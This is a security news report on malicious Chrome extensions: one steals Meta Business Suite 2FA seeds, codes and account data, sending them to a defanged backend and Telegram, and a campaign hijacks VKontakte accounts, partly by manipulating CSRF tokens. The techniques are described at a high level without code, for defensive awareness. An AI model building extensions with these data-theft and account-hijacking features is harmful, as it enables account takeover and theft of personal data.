Malicious Chrome Extensions Exploit Meta Business Suite and VKontakte Users
Cybersecurity researchers have recently uncovered a malicious Google Chrome extension designed to exploit users of Meta Business Suite and Facebook Business Manager. This extension, named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl), was initially uploaded to the Chrome Web Store on March 1, 2025, and has since been installed by 33 users.
Marketed as a tool to scrape Meta Business Suite data, eliminate verification pop-ups, and generate two-factor authentication (2FA) codes, the extension’s true intent is far more nefarious. According to security researcher Kirill Boychenko from Socket, the extension requests extensive access to meta.com and facebook.com domains. Despite its privacy policy claiming that 2FA secrets and Business Manager data remain local, the extension clandestinely transmits Time-based One-Time Password (TOTP) seeds, current one-time security codes, Meta Business People CSV exports, and Business Manager analytics data to a backend server at getauth[.]pro. Additionally, it has the capability to forward these payloads to a Telegram channel controlled by the threat actor.
The extension’s malicious functionalities include:
– Stealing TOTP Seeds and 2FA Codes: By capturing these authentication elements, attackers can potentially gain unauthorized access to victims’ accounts.
– Extracting Business Manager People Data: The extension navigates to facebook[.]com and meta[.]com to compile a CSV file containing names, email addresses, roles, permissions, statuses, and access details of individuals associated with the Business Manager account.
– Enumerating Business Manager Entities: It builds a comprehensive CSV file detailing Business Manager IDs, names, attached ad accounts, connected pages and assets, as well as billing and payment configurations.
While the extension does not directly steal passwords, the exfiltrated 2FA codes and TOTP seeds can be exploited by attackers who have already obtained login credentials through other means, such as infostealer logs or credential dumps. This combination of information enables unauthorized access to victims’ accounts, posing significant security risks.
Despite its relatively low installation count, the extension provides attackers with sufficient data to identify high-value targets and orchestrate subsequent attacks. Boychenko emphasizes that the extension’s features, such as people extraction, Business Manager analytics, popup suppression, and in-browser 2FA generation, are not mere productivity tools. Instead, they serve as purpose-built scrapers targeting critical Meta platforms, collecting contact lists, access metadata, and 2FA materials directly from authenticated pages.
Chrome Extensions Hijack VKontakte Accounts
In a related development, cybersecurity firm Koi Security has identified a large-scale campaign, codenamed VK Styles, targeting approximately 500,000 users of VKontakte (VK), a popular Russian social media platform. This campaign involves Chrome extensions masquerading as VK customization tools, which, once installed, silently hijack user accounts.
The malicious extensions are designed to perform several unauthorized actions:
– Automatic Subscriptions: Users are involuntarily subscribed to the attacker’s VK groups, increasing the groups’ visibility and reach.
– Resetting Account Settings: Every 30 days, the extensions reset account settings to override user preferences, ensuring persistent control over the accounts.
– Bypassing Security Protections: By manipulating Cross-Site Request Forgery (CSRF) tokens, the extensions circumvent VK’s security measures, facilitating unauthorized actions.
– Maintaining Persistent Control: The extensions employ various techniques to ensure ongoing access and control over the compromised accounts.
These findings underscore the growing threat posed by malicious browser extensions, which can infiltrate user systems under the guise of legitimate tools. Users are advised to exercise caution when installing browser extensions, especially those requesting extensive permissions or originating from unverified sources. Regularly reviewing and auditing installed extensions can help mitigate potential security risks.
